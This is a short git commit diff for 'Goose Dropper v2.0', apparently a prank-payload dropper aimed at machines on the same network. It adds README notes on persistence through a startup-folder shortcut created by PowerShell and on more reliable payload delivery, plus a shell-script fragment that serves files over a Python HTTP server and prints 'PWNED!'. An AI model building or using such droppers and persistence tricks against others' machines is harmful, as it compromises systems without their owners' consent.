Goose Dropper v2.0 bugfix
This commit is contained in:
@@ -25,3 +25,8 @@ Currently there is no auto-configurator for Windows but it's in the works. Steps
|
||||
Ensure configuration is run while on the same network as your target, re-configure with each new network.
|
||||
|
||||
All credit goes to Samperson for the development of Desktop Goose: https://itch.io/profile/samperson | https://twitter.com/samnchiet
|
||||
|
||||
**=== v2.0 Notes ==**
|
||||
Added persistence via a PowerShell script that makes a shortcut in the startup folder.
|
||||
Revamped updater with more options and better dialogue.
|
||||
Bugfixes to ensure payloads get delivered successfully.
|
||||
|
||||
@@ -78,5 +78,5 @@ then
|
||||
python3 -m http.server 1337 && echo "PWNED!"
|
||||
else
|
||||
clear
|
||||
echo "Finished... Happy PWNing (don't be a skid)!"
|
||||
echo "Finished... Happy PWNing! (don't be a skid)!"
|
||||
fi
|
||||
|
||||
Reference in New Issue
Block a user